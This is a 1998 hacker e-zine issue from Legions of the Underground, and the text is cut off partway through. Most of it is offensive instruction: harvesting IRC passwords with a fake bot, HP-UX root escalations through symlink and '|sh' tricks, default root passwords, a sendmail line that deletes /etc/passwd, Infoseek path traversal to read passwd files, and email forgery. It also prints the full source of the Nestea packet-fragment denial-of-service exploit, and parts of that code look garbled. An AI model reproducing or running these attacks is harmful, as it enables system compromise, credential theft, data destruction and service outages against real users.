=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= *-* K e e n V e r a c i t y *-* *-* Volume One (rev. 2) - April 1998 *-* *-* *-* *-* L e g i o n s o f t h e *-* *-* U n d e r g r o u n d *-* *-* http://www.legions.org *-* =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= C o n t e n t s: /Z1#P10.01/ o-NEWS-o * About - | |- optiklenz * ------------------------ | |- * Beach Con - | |- sync * ------------------------ | |- * Phreak Zine - | |- optiklenz * ------------------------ | |- * This Months Linkage - | |- LegionPhreak * ------------------------ | |- o-IRC-o * Irc Social Engineering - |*revisited|- optiklenz * ------------------------ | |- * Legions Script - | BitchX |- HyperLogik * ------------------------ | |- o-Neophytes-o * Basic Unix Commands - | |- optiklenz * ------------------------ | |- * Exploits? - | |- miah * ------------------------ | |- o-Security-o * HPUX Security Overview - | revised |- tip * ------------------------ | |- * HPUX Exploits Note - | bugs |- optiklenz * ------------------------ | |- * Nestea Exploit - | advisory |- Dallion * ------------------------ | |- * Infoseek - | exploit |- optiklenz * ------------------------ | |- * Fake Mail - | revised |- optiklenz * ------------------------ | |- * Wingate Exertion - | |- optiklenz * ------------------------ | |- * backdoor.c - | |- jsbach * ------------------------ | |- * IP Spoofing - | |- optiklenz * ------------------------ | |- * Anal Sniff - | |- chron1c * ------------------------ | |- * Back Attack - | |- chrak * ------------------------ | |- * Irix LMR - | |- optiklenz * ------------------------ | |- * Securing Linux - | |- BlackIC * ------------------------ | |- * FoolProof - | |- Duncan Silver * ------------------------ | |- o-Misc-o * pnp56K Linux Setup - | |- mosoka * ------------------------ | |- * Sniffer Log - | |- chrak * ------------------------ | |- o-Comic Relief-o * Young Hackers, and Jail | |- Analyzer * ------------------------ | |- ---------------------------------------------------------------------- - { = - = N E W S = - = } - [ABOUT]-----------------------------------------------------| optiklenz | This zine covers different aspects of computing. This month's security focus is concentrated on the HP-UX platform. This month's guest editor is Analyzer. Guest editors, along with the topic the editor is writing on, will change monthly. Most of our articles, and zines for the past 6 years have been distributed through bulletin board services. Our own Electronic Source, and Abyss BBS just to name a couple. This is actually our first zine release being distro'd via the web. We release a new zine every month. If you would like to submit an article for the next zine, send email to: webmaster@legions.org with the subject matter of the article. Also if there is a certain subject you'd like to see written about in the next zine, please let us know. (1)------------NEWS------------------------------------------------(1) [Beach Con]------------------------------------------------------| sync | Last year's Legion Con's (Cyber Con) theme was "Network Utilization." This year, there will be a multiude of themes which will range from mainstream security and cryptology, to telephony and other types of electronic manipulation. (2)------------NEWS------------------------------------------------(2) [Phreak Zine]-----------------------------------------------| optiklenz | We are currently working on our Phreak zine. There is progess, but production is going extremely slow, being that members are currently occupied with their own activities. An example of some of the zine's content is listed below. [o] Shadowing your ANI [o] Detailing, and using a beige box [o] ATT-CONF [o] Phone Tapping [o] Discreet frequencies [o] Telenet #'s [o] More... Want to submit an article? Mail webmaster@legions.org with the article title first. We will either "ok" it or decline it depending on your article content, or if someone has already choosen the same subject matter. (3)------------NEWS------------------------------------------------(3) [Linkage]------------------------------------------------| LegionPhreak | This Months Linkage: They Finally Have a Static Layout A UDDF.NET Production (www.uddf.net) http://www.hackers.com http://www.hackedsites.com Exploits Galore Beat Your Meat (It's Good for You) http://www.rootshell.com http://www.freshmeat.net Rhino9 Unix Guru http://www.rhino9.com http://www.ugu.com/ Link of the month: http://www.legions.org (4)------------NEWS------------------------------------------------(4) - { = - = I R C = - = } - [Social Engineering]----------------------------------------| optiklenz | Gaining users' passwords via irc Method 1. First, you need two irc clients open. This method is more authentic if you have operator status in the channel. On one of the open clients, name yourself Bot, or something to that effect, and on the other client use your regular nick. If someone is looking to get op's let them know that there is a Bot in the channel, and if the user/users want ops they must first identify themselves with the Bot using the '/msg Bot identify password' command. After you tell them this and leave the room either way the passwd's will come rolling in. It's less suspicious if you leave though, because people will think damage can't be done if you're not there to do it. On the antithesis you are still there because you are the Bot just sitting there collecting passwd's. These passwd's are maybe for their email account, website, and other things. So go back later and ask the people that fell for it if they have a website, or for their email address, etc, etc. (5)------------IRC-------------------------------------------------(5) [Legions Script]-------------------------------------------| Hyperlogik | Legions script for Linux is due out in a few weeks. More info will be posted in the next zine. (6)------------IRC-------------------------------------------------(6) - { = - = N E O P H Y T E S = - = } - Note: The content of the neophytes section will grow more in-depth every month. Escalating from basic to median, and so on... [Basic Unix Commands]---------------------------------------| optiklenz | who is on shows who is logged on the system write name name equiv to the person you want to chat with (ctrl D exits chat mode) EOT End of Transfer du -a mem check ps -pid user kills a user passwd Change your users passwd ls List all files in a directory (ls -a) telnet start a telnet session open open a location ftp start file transfer session find Find a file cd\dir dir being sub-directory netstat See current processes running among your connection. chgrp Changes a file's group ownership cat "file" type contents try cat /etc/passwd tcpdump Packet sniffer, moniter packets in promniscious mode rmdir Deletes one or more directories sleep Causes a process to become inactive for a specified amount of time sort Sort and merge one or more files spell Finds spelling errors in a file split Divides a file stty Displays or set terminal parameters tail Displays the end of a file troff Outputs formatted output to a typesetter tset Sets other terminal type unmask Allows the user to specify a new creation mask uucp Unix-to-Unix copy vi Full screen editor wc Displays details in the file size who Displays information on the system users write Used to send a message to another user ifconfig To see the routing layout/destination of packets, etc. gcc Compile C based code rm delete file mv rename bfs Scans a large file cal Displays a calendar mkdir Create a directory chmod Assign File permissions TIP: If you have temp access to a system, chmod 777 $home or chmod $email so you have access to their home directory, as well as their email later. (7)------------NEOPHYTES-------------------------------------------(7) [Exploits]-------------------------------------------------------| miah | A lot of people ask me about exploits, what they are, what they do, and how they use them. Well, I'm writing this document to explain this for hopefully my last time. It's just starting to bother me that I have to explain this everytime I'm on irc, so I thought there should be a text explaining them. Well, here it is. --- What is an 'exploit' ? --- Well to explain this simply, an exploit is a program that 'exploits' a bug in a specific software. All exploits are different, they do different things, exploit different bugs, etc. That's why exploits are allways program specific. Exploits are made to get root on different operating systems. They achive this by exploiting a bug in software when the software is running as root. In UNIX type OS's, software may have to run as root (or UID 0) in order to perform a specific task that cannot be performed as another user. So basically the exploit crashes the software while running as root to give you the beautiful root prompt. Well, now that I've answered questions one and two, I'm going to move on to question 3. --- How do I use an exploit? --- Since exploits are coded in C 99% of the time, you need a shell on the box you are going to use the exploit on, OR, you need to be running the same OS as the box you are attempting to hack. So basically, you need to put the source code, or the binary in your shell accounts dir, (you want to use a hacked, or a shell that's not yours for this :) ) to put it on your shell, you can ftp to your account and upload it that way, or you can use rz if you are using a dialup shell. Either way, I shouldn't have to explain those to things too much, it's pretty easy. Once you have the exploit on the box, you just need to compile it. Usually you would compile the exploit like so: blah:~/$gcc exploit.c That should compile your exploit. However, be aware that some exploit coders are sneaky pests, and like to pick on people who dont know C, so they will sometimes insert bugs into the exploit, thus disabiling it to be compiled. So it does help to know C, when playing with C. :) After the compiling is done, you should be able to just run the exploit and its work will be done when you see the root prompt. However, not all exploits are the same, and might require different commandlines to get them to work. --- Where can I get some exploits? --- Well, two of the best places I have found for exploits are: http://get.your.exploits.com and http://www.rootshell.com (8)------------NEOPHYTES-------------------------------------------(8) - { = - = S E C U R I T Y = - = } - [Hpux Security Overview]------------------------------------------| tip | =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= HP-UX: A Security Overview, Part One revision02 17mar98 http://www.legions.org --------------------------------------------------------------------------- Table of Contents: 1) Intro and Disclaimer 5) The Trusted System 2) HP-UX: an Overview 6) Resources 3) The Setup by Default 7) Exploits 4) HP-UX Security Measures 8) To Be Continued --------------------------------------------------------------------------- 1) Intro and Disclaimer a) This text is designed to complement to general Unix knowledge. All Unix OS's are different in their own right. This text will delve into HP-UX- specific areas. This is not a Unix tutorial, rather a supplement to fundamental Unix hacking knowledge. b) This text will cover HP-UX version 10.x primarily. Specifically, 10.10 and 10.20 will be in mind. 11.0 has been released and I haven't gotten to checking it out yet. 9.x is old, and no longer supported by HP. Thus, the most logical choice (and most popular version of HP-UX) is 10.x. c) I'm not perfect; please notify me of any errors in the document. Also, if you see anything you want added to this file, feel free to send them to me. d) This text was written for educational purposes only. e) Thanks to HP, rootshell, and the various other hacker folks that have helped me write this article. Special thanks to Colonel Panic for find- ing many exploits, some of which I have used as examples. Shouts out to my fellow LoU members, the SOD, and the Chicago crew. --------------------------------------------------------------------------- 2) HP-UX: an Overview Largely based on SysV, Hewlett Packard's version of Unix, HP-UX, has un- dergone many changes and many version updates (current version is 11.0). While robust in many areas (ie, memory management, overall performance, etc), security leaves much to be desired. HP's vision of Unix seems to come from that of a closed network with non-malicious users (ie, /usr/local being world-writeable); only recently has the Internet been an explosion, and HP seems to be playing "catch up" to network and internal security. HP's solution to security problems have been patches. Lots of patches. You can see the patches on a system by typing "swlist -l product" (substitute "fileset" instead of "product" for more specific information. Patch and software information is stored in /var/adm/sw; so you can check out older pre-patched binaries there. As usual, system logs are kept in /var/adm (along with btmp, utmp, and wtmp). --------------------------------------------------------------------------- 3) The Setup by Default By default, HP-UX is VERY insecure. Yes, most Unixes are (by default), but HP-UX even more so. Here is a brief following of what is insecure by default: o /usr/local and subdirectories are world writeable. o Many applications by default are installed as world writeable (ie, measureware database module for oracle installs this way. o root's umask is set to: 02. o cue is installed (see section 6 for the exploit). o System is un-"Trusted." See section 4. o Direct login as root possible from all ttys (as result of being un- "Trusted"). o System logging is set pretty minimal (see /etc/syslog.conf); not that it matters, as system logging is pretty minimal no matter how you have it. o /etc/logingroup non-existent. While this is not an insecurity, it's worth mentioning. --------------------------------------------------------------------------- 4) HP-UX Security Measures o Suid scripts not possible This is a popular trend in newer Unix OS's. Basically, if you have a suid script, it will not be run as root. Binaries are what's important. o Dialup passwords You can set an additional password for a dialin device. If you dialed into an HP-UX server with dialup passwords enabled, you would enter your usual login and password, then an _additional_ dialup password. Each dialup password is dependant of the shell; the shell is used as the "login" field. To explain further, look at /etc/d_passwd: /bin/sh:qKrbuYLg9B2vU:0:0::: /bin/csh:4LcBNqYbmdp3Y:0:0::: /bin/ksh:zKanqUcdEzh3Q:0:0::: What's important here are the first two fields (obviously). Two other things to note; Firstly, if the system is relatively secure, the "login" field can only be eight characters long. This creates a problem if your shell is "/usr/local/bin/tcsh" (19 chars). Thus, what's done is either: a link is created that is less than eight characters (ie, /bin/tsh -> /usr /local/bin/tcsh) or dialup passwords just aren't used. Secondly, the file to reference which tty the dialin is located is /etc/dialups: /dev/ttyd0p7 That's it. That's the format of the file. o lanscan and ioscan Just a side note to the standard commands, ifconfig and netstat. lanscan will tell you what interface cards you have on the system, which are up or down, etc, etc. ioscan is similar, but covers the entire system, ie, hard drives, I/O adapters, memory, etc. Might be useful in getting more intimate with your system. --------------------------------------------------------------------------- 5) The Trusted System What is a "Trusted System"? Check for a /tcb directory. The existence of a /tcb directory signifies that the system you're on is a "Trusted System." The conversion to this is done through /usr/sbin/sam by root. Here is what converting does to a system: o Pseudo-shadow password scheme (actually uses a "protected password database"). o A stricter password authentication system. o User auditing. o Access control lists (acls) [note: only supported under hfs, not vxfs] [second note: being phased out]. o Terminal and time-based access control. Basically to put this all together, in the /tcb/files/auth directory, there are a number of subdirectories by capital and lowercase letters, ie, "e," "T," and so forth. This is the initial of the login. In that directory is a file per user. Thus, root's file would be /tcb/files/auth/r/root. What's in this file? It's basically like a password entry, with more fields. ie, /tcb/files/auth/r/root: root:u_name=root:u_id#0:\ :u_pwd=Z1Po84UVyBbGE:\ :u_bootauth:u_auditid#0:\ :u_auditflag#1:\ :u_pswduser=root:u_suclog#8895646615:u_lock@:chkent root's entry in /etc/passwd would then be: root:*:0:3:root:/:/sbin If it isn't obvious, the login and user id of an /etc/passwd are there, along with additional information. The above example has only a few fields listed. The full contents of an HP-UX password database file would contain: a login and user id b encrypted password c account owner d single user mode boot flag e audit id and audit flag f minimum time between password change (not in example - u_minchg) g password max length h password expiration time (not in example - u_maxlen) (not in example - u_exp) i password lifetime j time of last password change (not in example - u_life) (not in example - u_usucchg & u_unsucchg) k absolute password expiration date l max time allowed between logins (not in example - u_acct_expire) (not in example - u_max_llogin) m max days before expiration when before acct is locked warning will appear n user or system generated password? (not in example - u_pw_expire_ (not in example - u_pickpw) warning) o type of sys-ten passwords p triviality check on user-gen (not in example - u_genpwd) (not in example - u_restrict) q can pick null password? r userid of last person who changed (not in example - u_nullpw) this password (not in example - u_pwchanger) s random # that user must supply t can user generate random # for a (given to him by the admin) when password? (not in example - password is reset (not in example u_genchars) - u_pwd_admin_num) u can user generate random letters v time of day when user can login for a password? (not in example (not in example - u_tod) - u_genletters) w time of last successful login x time of last unsuccessful login (not in example - u_suclog) (not in example - u_unsuclog) y term or remote hosts from last z number of unsuccessful logins, this successful and unsuccessful logins # clears upon a successful login (not in example - u_suctty & (not in example - u_numunsuclog) u_unsuctty) 1 max number of login attempts 2 account locked flag (not in example before account is locked - u_lock) (not in example - u_maxtries) In /tcb/files, in addition to auth, there are two files, devassign and ttys. devassign contains device access info and ttys contains term access info. Here are a few lines from devassign: console:v_devs=/dev/console:v_type=terminal:chkent: ttyp0:v_devs=/dev/ttyp0:v_type=terminal:chkent: ttyp1:v_devs=/dev/ttyp1:v_type=terminal:chkent: The format of this file contains: a device name b aliases to that device c device supported (ie, printer, d users permitted on that device, if terminal, tape, or remote) not specified, all users may use it Here are a few lines from ttys: console:t_devname=console:t_maxtries#777:chkent: tty:t_devname=tty:chkent: tty00:t_devname=tty00:chkent: The above example only has a few fields listed. The full format of this file contains: a device name b last user (id) to log into that tty (not in example - t_uid) c last successful login time d last unsuccessful login time (not in example - t_logtime) (not in example - t_unsuctime) e number of consecutive logins f terminal lock flag before tty is locked In all actuality, not many HP-UX systems are setup to be Trusted. Managing a password database and tweaking is more work than neccessary. In addition, remote commands are not possible on a Trusted System, unless it is done _from_ a Trusted System. Lastly, mapping files to sync /etc /passwd with /tcb/files/auth are contained in /tcb/files/auth/system. These are called pw_id_map, gr_id_map, and aid_id_map. It is very likely that these mapping files will get out of sync with the database files. The solution is removing them and letting them regenerate. However, all in all, having a Trusted System can prove to take as much maintanence as an un- Trusted System. It's really the admin's call. I've seen maybe about half and half these days. --------------------------------------------------------------------------- 6) Resources o If you have a question about a patch, check out ftp://us-support. external.hp.com. All the current patches are available there for your peruseal. o http://www.rootshell.com, http://get.your.exploits.org, http://www.hha. net/hha/exploits, http://www.dhp.com/~fyodor/sploits_hpux.html: Very good sites with Unix and HP-UX-specific exploits. Both explanations and source code/scripts are available here. o Usenet: comp.os.security.announce and comp.sys.hp.hpux: Sometimes regular updates of weaknesses. Avoid alt.2600 at all costs. o And of course, the ever-so-handy man command. --------------------------------------------------------------------------- 7) Exploits These are only a few of many. I only added a few, as I wanted to explain about HP-UX security in general. Part 2 will delve deeper into exploits (as well as auditing, system calls, and acls). o cue bug The first thing after gaining access to an HP-UX system is to check if cue exists (typically in /usr/bin/cue). Make sure it's an suid binary (which it is by default). Simply set your umask to 000. Now start cue. In your home directory, do an ll. You'll see that the name of the file created by cue (in my case, it's called "IDMERROR.ttyp1") is owned by root. You'll also see that the umask follows and is world-writeable. Now exit cue. Remove the *ERROR* file created by cue. Think of a file like /etc/passwd or /.rhosts. Do an "ln -s /etc/passwd ~/IDMERROR.ttyp1" (or whatever suits your needs). Now start cue again. Exit it. You'll see that the root owned file that wasn't writeable by anyone not only is now truncated, but it has world write permission. Do whatever you want with it. o ftp mget bug This won't do you much good if ftp isn't suid root (most likely it won't be), but this still works (not as root though). In /tmp, create a separate directory (we'll use "test"). cd to that directory and execute this command: echo "date > /tmp/BLAH" > "|sh". Notice that /tmp/BLAH does not exist. Now, ftp to localhost. cd to /tmp/test and do a "mget *". ftp that file. Now quit ftp and check for a /tmp/BLAH. It exists! cat it. Now what if ftp was suid root, and the echo command you used to create "|sh" was this: echo "chmod 777 /etc/passwd" > "|sh"? o Old SAM bug Typically, when SAM (System Administration Manager) is being run by an admin, a temp file is created in /var/tmp. Newer, patched SAMs use arbitrary file names, ie OBAMDBAa01687 or aaaa01990, etc. But older SAMs used a consistent file name when writing this temp file. It was called: outdata. Since SAM is typically run as root, you'll see what I'm getting at here (duh, the temp file is owned by root). Simply create a link to a file, such as /etc/passwd to that temp file (ie, ln -s /etc/passwd /var /tmp/outdata). Now if root's umask is set to 000, then you'll own /etc /passwd next time the admin runs SAM. This trick is unlikely these days, as most SAMs are patched and most admins don't use umask 000 on root. o Old SAM bug 2 On older versions of SAM, a user named sam_exec was created with uid 0. The default password for this on 10.x is: x7vpa5jh Simply login as sam_exec, and hit control-c right away for a shell. o ppl bug Another symbolic link exploit. ppl's log file is: /var/ppl/log. Now, you can simply remove or move this (so that /var/ppl/log is non-existent; also /var/ppl is world-writeable on default, thus you can do this). This log file is owned by root (ppl is an suid program). Next, think of a file that you'd like to nuke and own (if you don't want to get caught, try /.rhosts instead of something like /etc/passwd; in addition, save the old /var/ppl/log somewhere to put back when you're done). Now do a: ln -s /.rhosts /var/ppl/log. Then type: ppl -o '\ + + ' or whatever you want to place in /.rhosts. You get the drift. Now you can remove /var/ppl/log and put the old one back in place. You can now rlogin as root. o Educational Centers HP's educational centers are protected mainly by firewalls. But if you happen to get in, the root password on nearly all machines is simply: hp. --------------------------------------------------------------------------- 8) To Be Continued Part Two will delve deeper into the Trusted System, specifically cover- ing auditing and acls. Exploits will also be covered in greater detail. --------------------------------------------------------------------------- (c) 1998 tip of Legions of the Underground http://www.legions.org =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= (9)------------SECURITY--------------------------------------------(9) [Hpux Exploits Note]----------------------------------------| optiklenz | HP_UX versions 1.2&13.1 sm, -oQ ==> can read/write any file 5.57 from:<"|/bin/rm /etc/passwd"> && bounce mail.... HPUX <7.0 1-- chfn -- allows newlines, etc () HP-UX 1-- sendmail: mail directly to programs () HPUX A.09.01 1-- sendmail: mail directly to programs () 1) libXt: This is a widely known security hole that allows local users to gain root access via setuid X programs like xterm or xload. A recommendation is to replace the guilty libraries by applying X/Motif "jumbo" patches, which is a good thing anyway. 2) sendmail: Yet another sendmail hole. The best solution at CERN is maybe to use the public domain version of sendmail (used by default on all HP-UX 10.20 systems) that does not seem vulnerable. (10)-----------SECURITY-------------------------------------------(10) [Nesta Exploit]-----------------------------------------------| Dallion | --------------------------------------------------------- Note: Nestea by humble\nCode ripped from teardrop by route --------------------------------------------------------- Basically crashes a machine using "off by one" IP headers. Like boink and land reversed. It's a total rip (the code that is) but it works, none the less. I have tested it on machines running Linux kernels 2.0.33 and 2.1.95 both machines went slamming down when I hit them. I like this toy. :) To fix it: 1) If you do packet filtering, set it to filter off by one IP headers 2) Fix your kernel to not process these packets. - Dallion Dalson Here is the exploit: 01. nestea.c - exploits the "off by one IP header" bug in Linux // nestea.c by humble of rhino9 4/16/98 // This exploits the "off by one IP header" bug in the Linux IP frag code. // Crashes Linux 2.0.* and 2.1.* and some Windows boxes // this code is a total rip of teardrop - it's messy #include #include #include #include #include #include #include #include #include #include #include // bsd usage is currently broken because of socket options on the third sendto #ifdef STRANGE_BSD_BYTE_ORDERING_THING /* OpenBSD < 2.1, all FreeBSD and netBSD, BSDi < 3.0 */ #define FIX(n) (n) #else /* OpenBSD 2.1, all Linux */ #define FIX(n) htons(n) #endif /* STRANGE_BSD_BYTE_ORDERING_THING */ #define IP_MF 0x2000 /* More IP fragment en route */ #define IPH 0x14 /* IP header size */ #define UDPH 0x8 /* UDP header size */ #define MAGIC2 108 #define PADDING 256 /* datagram frame padding for first packet */ #define COUNT 500 /* we are overwriting a small number of bytes we shouldnt have access to in the kernel. to be safe, we should hit them till they die :> */ void usage(u_char *); u_long name_resolve(u_char *); u_short in_cksum(u_short *, int); void send_frags(int, u_long, u_long, u_short, u_short); int main(int argc, char **argv) { int one = 1, count = 0, i, rip_sock; u_long src_ip = 0, dst_ip = 0; u_short src_prt = 0, dst_prt = 0; struct in_addr addr; if((rip_sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) { perror("raw socket"); exit(1); } if (setsockopt(rip_sock, IPPROTO_IP, IP_HDRINCL, (char *)&one, sizeof(one)) < 0) { perror("IP_HDRINCL"); exit(1); } if (argc < 3) usage(argv[0]); if (!(src_ip = name_resolve(argv[1])) || !(dst_ip = name_resolve(argv[2]))) { fprintf(stderr, "What the hell kind of IP address is that?\n"); exit(1); } while ((i = getopt(argc, argv, "s:t:n:")) != EOF) { switch (i) { case 's': /* source port (should be emphemeral) */ src_prt = (u_short)atoi(optarg); break; case 't': /* dest port (DNS, anyone?) */ dst_prt = (u_short)atoi(optarg); break; case 'n': /* number to send */ count = atoi(optarg); break; default : usage(argv[0]); break; /* NOTREACHED */ } } srandom((unsigned)(time((time_t)0))); if (!src_prt) src_prt = (random() % 0xffff); if (!dst_prt) dst_prt = (random() % 0xffff); if (!count) count = COUNT; fprintf(stderr, "Nestea by humble\nCode ripped from teardrop by route / daemon9\n"); fprintf(stderr, "Death on flaxen wings (yet again):\n"); addr.s_addr = src_ip; fprintf(stderr, "From: %15s.%5d\n", inet_ntoa(addr), src_prt); addr.s_addr = dst_ip; fprintf(stderr, " To: %15s.%5d\n", inet_ntoa(addr), dst_prt); fprintf(stderr, " Amt: %5d\n", count); fprintf(stderr, "[ "); for (i = 0; i < count; i++) { send_frags(rip_sock, src_ip, dst_ip, src_prt, dst_prt); fprintf(stderr, "b00m "); usleep(500); } fprintf(stderr, "]\n"); return (0); } void send_frags(int sock, u_long src_ip, u_long dst_ip, u_short src_prt, u_short dst_prt) { int i; u_char *packet = NULL, *p_ptr = NULL; /* packet pointers */ u_char byte; /* a byte */ struct sockaddr_in sin; /* socket protocol structure */ sin.sin_family = AF_INET; sin.sin_port = src_prt; sin.sin_addr.s_addr = dst_ip; packet = (u_char *)malloc(IPH + UDPH + PADDING+40); p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + 10); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) |= FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + 10); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + 10, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING); byte = 0x45; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + MAGIC2); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = FIX(6); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 4; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + MAGIC2); /* UDP total length */ if (sendto(sock, packet, IPH + UDPH + MAGIC2, 0, (struct sockaddr *)&sin, sizeof(struct sockaddr)) == -1) { perror("\nsendto"); free(packet); exit(1); } p_ptr = packet; bzero((u_char *)p_ptr, IPH + UDPH + PADDING+40); byte = 0x4F; /* IP version and header length */ memcpy(p_ptr, &byte, sizeof(u_char)); p_ptr += 2; /* IP TOS (skipped) */ *((u_short *)p_ptr) = FIX(IPH + UDPH + PADDING+40); /* total length */ p_ptr += 2; *((u_short *)p_ptr) = htons(242); /* IP id */ p_ptr += 2; *((u_short *)p_ptr) = 0 | FIX(IP_MF); /* IP frag flags and offset */ p_ptr += 2; *((u_short *)p_ptr) = 0x40; /* IP TTL */ byte = IPPROTO_UDP; memcpy(p_ptr + 1, &byte, sizeof(u_char)); p_ptr += 4; /* IP checksum filled in by kernel */ *((u_long *)p_ptr) = src_ip; /* IP source address */ p_ptr += 4; *((u_long *)p_ptr) = dst_ip; /* IP destination address */ p_ptr += 44; *((u_short *)p_ptr) = htons(src_prt); /* UDP source port */ p_ptr += 2; *((u_short *)p_ptr) = htons(dst_prt); /* UDP destination port */ p_ptr += 2; *((u_short *)p_ptr) = htons(8 + PADDING); /* UDP total length */ for(i=0;ih_addr, (char *)&addr.s_addr, host_ent->h_length); } return (addr.s_addr); } void usage(u_char *name) { fprintf(stderr, "%s src_ip dst_ip [ -s src_prt ] [ -t dst_prt ] [ -n how_many ]\n", name); exit(0); } (11)-----------SECURITY-------------------------------------------(11) [Infoseek]--------------------------------------------------| optiklenz | http://www.infoseek.com/cgi/bin?/./view?/home/path Alternate bin with etc (etc, etc), and you will receive /etc/ directory structure which contains the passwd file. The above exploits a discreet flaw in Infoseek's cgi. It can be used to view various binaries, and commands. If you are viewing it using a Netscape browser, keep reloading the document; output will change the binary data. If you are using lynx you should receive command binary, and a directory structure... /bin/ For example: imeOasetunameOäsleepOåstrchgOæstrconfOçsttyOèsuOétabsOêtailOëtalkOìtee OítelnetOîtftpOïticOþtimeOñtipOòtplotOótputOôtrOotrueOöttyO÷unameOøupt imeOùvacationOúvmstatOûwcOüwhichOywhoOþwhoisOwriteOxargsOxstrONbgONcd ONcommandO[dispgidOddispuidOzexONfcONfgONgetoptsONhashOi386Oi486Oi860O i86pcOiAPX286ONjobsONkillOhlnOm68kOmc68000Omc68010Omc68020Omc68030Omc6 8040OhmvOþpageOpdp11ONreadOyredO¥rkshOshOsparcOsunOsun2Osun3Osun3xOsun 4Osun4cOsun4dOsun4eOsun4mONtestOâtouchONtypeOu370Ou3bOu3b15Ou3b2Ou3b5O NulimitONumaskONunaliasOvaxOzveditOzviOzviewOøwONwaitOAyppasswdOdmesgO pcatOstraceOasaOawkObannerObatchO bcO bdiffObfsOcalO calendarOcolOcommOcompressOcsplitOdcOdiffOdiff3OdircmpOdos2unixOexpand OfactorOgraphOlastOlastcommOlognameOlookOmkfifoOnawkO OfactorOgraphOlas OlastcommOlognameOlookOmkfifoOnawkO newformO!newsO"nlO#packO$pasteO%rupO&rusersO'sdiffO(sortO)spellO*splin eO+splitO,sumO-tcopyO.unexpandO/uniqO0unitsO1unix2dosO2unpackO3uudecod eO4uuencodeO5vsigOoawkO uncompressOzcatO6volcheckO7audioconvertO8 admintoolO;showrevOchrtblO?colltblO@gencatOAgettxtOBkbdcompOClocaleODm kmsgsOEmontblOFmsgfmtOGprintfOHsrchtxtOIxgettextO>wchrtblOJaddbibOKapr oposOLcheckeqOMchecknrONdapsOOderoffOPdiffmkOQeqnORindxbibOSlookbibOTn eqnOUnroffOVreferOWroffbibOXsoelimOYsortbibOZtaO[tblO\troffO]ulO^vgrin dOKcatmanOKmanOKwhatisO_sagO`sarOaacctcomObtimexOcctOdcuOeuucpOfuuglis http://www.infoseek.com/cgi/etc?/./read_./log/view?/home/passwd In lynx, it will list the directory structure for the etc directory. ie: /etc/ resolv.conf .. passwd notrouterHlogin.accessshellsIhosts.equivS defaultrouterTskeykeys" hostname.hme1 oshadowstmpP8opasswd(rdista005nY publickey;chrootmvdir?pwck@termcapAunlinkBrmmount.confC vold.confD.sysIDtool.stateE defaultdomainFnodenameG hostname.hme0.obp_devicesJinitpipe.old.35Wpath_to_inst.oldK.mnttab.loc If you use lynx, you will be able to grab the .passwd file. (12)-----------SECURITY-------------------------------------------(12) [Mail Forge]------------------------------------------------| optiklenz | I wrote about this years ago, and decided to revise. This exploits smtp (port numeric value 25) allowing you to forge email from a remote host. Unix/Linux users use: $ telnet url.host.net Windows users use: c:\windows\telnet <-- Enter url.host.net as the host to connect to, and 25 as the port. After connected: 220 url.host.net ESMTP Sendmail 8.8.5/SCO5 ready at Label, day month/day/year 3 -0400 (EDT) If it prompts with a "It's always polite to "helo" command, then just helo it. mail from: fake@faked.net [ Commands: ] then [ helo = call send ] rcpt to: user@domain.net [ mail = from sender ] [ rcpt = to recipient ] [ vrfy = verify ] [ help = help ] vrfy comes in to process if things don't seem to be going right. For verify it is good to know uid's of people who use the system your forging from. Use: vrfy uid (user id) Then type "data", and press enter. The first thing you'll type in is a title. Next is the body msg. Both should be on seperate lines. once finished type a --> . <-- then type quit, and press enter. (13)-----------SECURITY-------------------------------------------(13) [Wingate]---------------------------------------------------| optiklenz | Short preface on wingating vault purposes. One is able to use an exploit in certain systems to bounce from one host to another. A wingate can be used for system benefit or system downfall. One way it can be used is as a firewall to protect from outside attacks on your host. Another use is bouncing from one host to another to cover your tracks. This will put the fault on the system you wingated from. Unix/Linux usage: $ telnet wingate.net Windows usage: Run a telnet client and connect to a wingate address via port 23. Once prompted with " 